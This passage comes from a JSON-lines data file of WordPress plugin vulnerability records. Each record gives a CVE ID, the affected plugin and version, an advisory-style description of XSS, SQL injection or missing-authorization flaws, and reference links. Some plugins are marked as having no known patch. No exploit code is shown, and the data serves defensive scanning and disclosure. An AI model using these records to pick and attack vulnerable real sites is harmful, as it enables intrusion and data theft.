page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplebooklet\\\/trunk\\\/simplebooklet.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplebooklet\\\/trunk\\\/simplebooklet.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simplebooklet\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simplebooklet\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59d9ff2e-4b0b-4096-91ca-1a029f31796b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59d9ff2e-4b0b-4096-91ca-1a029f31796b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6383","slug":"wp-photonav","versionImpact":"1.2.2","description":"The WP-PhotoNav plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's photonav shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photonav\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photonav\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c07054e1-b6c9-4e70-aece-09f81bb418ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c07054e1-b6c9-4e70-aece-09f81bb418ef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2086","slug":"essential-blocks","versionImpact":"4.0.6","description":"The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the template_count function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to obtain plugin template information. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification to be skipped. There is no capability check.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9efc782a-ec61-4741-81fd-a263a2739e16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9efc782a-ec61-4741-81fd-a263a2739e16?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3226","slug":"popup-builder","versionImpact":"4.1.15","description":"The Popup Builder WordPress plugin through 4.1.15 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/941a9aa7-f4b2-474a-84d9-9a74c99079e2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/941a9aa7-f4b2-474a-84d9-9a74c99079e2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1516","slug":"wp-e-commerce","versionImpact":"3.15.1","description":"The WP eCommerce plugin for WordPress is vulnerable to unauthorized arbitrary post creation due to a missing capability check on the check_for_saas_push() function in all versions up to, and including, 3.15.1. This makes it possible for unauthenticated attackers to create arbitrary posts with arbitrary content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a9f3d2-aa7f-4fc2-9cfd-b69ec3f63160?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a9f3d2-aa7f-4fc2-9cfd-b69ec3f63160?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-e-commerce\\\/trunk\\\/wpsc-components\\\/marketplace-core-v1\\\/library\\\/Sputnik.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-e-commerce\\\/trunk\\\/wpsc-components\\\/marketplace-core-v1\\\/library\\\/Sputnik.php#L191\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1370","slug":"maintenance-page","versionImpact":"1.0.8","description":"The Maintenance Page plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the subscribe_download function hooked via AJAX action in all versions up to, and including, 1.0.8. This makes it possible for authenticated attackers, with subscriber access or higher, to download a csv containing subscriber emails.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fce54b1-e1e6-4742-9eb3-bbfb613ccd70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fce54b1-e1e6-4742-9eb3-bbfb613ccd70?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3074","slug":"fd-elementor-imagebox","versionImpact":"1.2.8","description":"The Elementor ImageBox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image box widget in all versions up to, and including, 1.2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e24c8f4-32c9-4c21-88d9-588913cbb474?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e24c8f4-32c9-4c21-88d9-588913cbb474?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fd-elementor-imagebox\\\/trunk\\\/elements\\\/fd-adv-imagebox.php#L534\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fd-elementor-imagebox\\\/trunk\\\/elements\\\/fd-adv-imagebox.php#L534\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4458","slug":"themesflat-addons-for-elementor","versionImpact":"2.1.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in several widgets via URL parameters in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0ff03ab-eeb9-4445-92c8-326783d4b10e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0ff03ab-eeb9-4445-92c8-326783d4b10e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9272","slug":"r-animated-icon","versionImpact":"1.0","description":"The R Animated Icon Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56fd8166-da22-4a0b-a23f-41817acba6df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56fd8166-da22-4a0b-a23f-41817acba6df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/r-animated-icon\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/r-animated-icon\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9674","slug":"debrandify","versionImpact":"1.1.2","description":"The Debrandify \u00b7 Remove or Replace WordPress Branding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2110d13-d6d3-43f8-b1bf-8958d4f39ef5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2110d13-d6d3-43f8-b1bf-8958d4f39ef5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/debrandify\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/debrandify\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170586\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170586\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11034","slug":"get-a-quote-button-for-woocommerce","versionImpact":"1.4","description":"The The Request a Quote for WooCommerce and Elementor \u2013 Get a Quote Button \u2013 Product Enquiry Form Popup \u2013 Product Quotation plugin for WordPress is vulnerable to arbitrary shortcode execution via fire_contact_form AJAX action in all versions up to, and including, 1.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-a-quote-button-for-woocommerce\\\/tags\\\/1.3.9\\\/includes\\\/class-ajax.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-a-quote-button-for-woocommerce\\\/tags\\\/1.3.9\\\/includes\\\/class-ajax.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195227\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/get-a-quote-button-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/get-a-quote-button-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ccd3504-5663-48cd-90bc-502c2ce232f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ccd3504-5663-48cd-90bc-502c2ce232f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12822","slug":"userpro-mediamanager","versionImpact":"3.11.0","description":"The Media Manager for UserPro plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the add_capto_img() function in all versions up to, and including, 3.11.0. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/media-manager-for-userpro\\\/8664618\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/media-manager-for-userpro\\\/8664618\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a57b2afa-b943-419f-9819-d7b6835c4d10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a57b2afa-b943-419f-9819-d7b6835c4d10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-46262","slug":"mad-mimi","versionImpact":"1.5.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zack Katz Mad Mimi for WordPress allows Stored XSS.This issue affects Mad Mimi for WordPress: from n\/a through 1.5.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mad-mimi\\\/vulnerability\\\/wordpress-mad-mimi-for-wordpress-plugin-1-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mad-mimi\\\/vulnerability\\\/wordpress-mad-mimi-for-wordpress-plugin-1-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6378","slug":"responsive-food-and-drink-menu","versionImpact":"2.3","description":"The Responsive Food and Drink Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's display_pdf_menus shortcode in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-food-and-drink-menu\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-food-and-drink-menu\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/342ccae4-2e77-4a4f-963f-689b882eb7f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/342ccae4-2e77-4a4f-963f-689b882eb7f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0370","slug":"wpb-advanced-faq","versionImpact":"1.0.6","description":"The WPB Advanced FAQ WordPress plugin through 1.0.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f5597f9-ab27-42d2-847c-14455b7d0849\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f5597f9-ab27-42d2-847c-14455b7d0849\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2085","slug":"essential-blocks","versionImpact":"4.0.6","description":"The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the templates function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to obtain plugin template information. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification to be skipped. There is no capability check.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad2c1ab6-5c78-4317-b5e7-c86e2eebeb4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad2c1ab6-5c78-4317-b5e7-c86e2eebeb4f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3166","slug":"lana-email-logger","description":"The Lana Email Logger plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, Lana Email Logger due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923581\\\/lana-email-logger#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923581\\\/lana-email-logger#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5f372bf-6b13-4ba7-8b8b-9d3b500e4420?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5f372bf-6b13-4ba7-8b8b-9d3b500e4420?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1514","slug":"wp-e-commerce","versionImpact":"3.15.1","description":"The WP eCommerce plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'cart_contents' parameter in all versions up to, and including, 3.15.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ba5da2b-6944-4243-a4f2-0f887abf7a66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ba5da2b-6944-4243-a4f2-0f887abf7a66?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-e-commerce\\\/trunk\\\/wpsc-components\\\/marketplace-core-v1\\\/library\\\/Sputnik.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-e-commerce\\\/trunk\\\/wpsc-components\\\/marketplace-core-v1\\\/library\\\/Sputnik.php#L334\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1365","slug":"yml-for-yandex-market","versionImpact":"4.2.3","description":"The YML for Yandex Market plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the feed_id  parameter in all versions up to, and including, 4.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c343cee6-909d-4c1a-a6e4-f916a2ae223e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c343cee6-909d-4c1a-a6e4-f916a2ae223e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3039876%40yml-for-yandex-market%2Ftrunk&old=3036732%40yml-for-yandex-market%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3039876%40yml-for-yandex-market%2Ftrunk&old=3036732%40yml-for-yandex-market%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3071","slug":"acf-on-the-go","versionImpact":"1.0.1","description":"The ACF On-The-Go plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the acfg_update_fields() function in all versions up to, and including, 1.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary post titles, descriptions, and ACF values.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46df438c-abff-4cf3-a732-02e0b3196bac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46df438c-abff-4cf3-a732-02e0b3196bac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-on-the-go\\\/trunk\\\/includes\\\/acfg-front-loader.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-on-the-go\\\/trunk\\\/includes\\\/acfg-front-loader.php#L139\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8317","slug":"wpadcenter","versionImpact":"2.5.6","description":"The WP AdCenter \u2013 Ad Manager & Adsense Ads plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ad_alignment\u2019 attribute in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac7f95c7-2159-4327-ba09-da7721f1312e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac7f95c7-2159-4327-ba09-da7721f1312e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L2922\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L2922\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadcenter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadcenter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L3020\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L3020\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L3127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L3127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146736\\\/#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146736\\\/#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146736\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146736\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9269","slug":"relogo","versionImpact":"0.4.2","description":"The Relogo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12515236-753e-49e8-b8c8-b0c8831c6005?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12515236-753e-49e8-b8c8-b0c8831c6005?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/relogo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/relogo\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9425","slug":"advanced-category-and-custom-taxonomy-image","versionImpact":"1.0.9","description":"The Advanced Category and Custom Taxonomy Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ad_tax_image shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f37fb598-72a2-48d3-b2e6-63d6654b1474?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f37fb598-72a2-48d3-b2e6-63d6654b1474?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-category-and-custom-taxonomy-image\\\/trunk\\\/wp-advanced-taxonomy-image.php#L495\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-category-and-custom-taxonomy-image\\\/trunk\\\/wp-advanced-taxonomy-image.php#L495\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-category-and-custom-taxonomy-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-category-and-custom-taxonomy-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170877\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170877\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12821","slug":"userpro-mediamanager","versionImpact":"3.12.0","description":"The Media Manager for UserPro plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the upm_upload_media() function in all versions up to, and including, 3.12.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 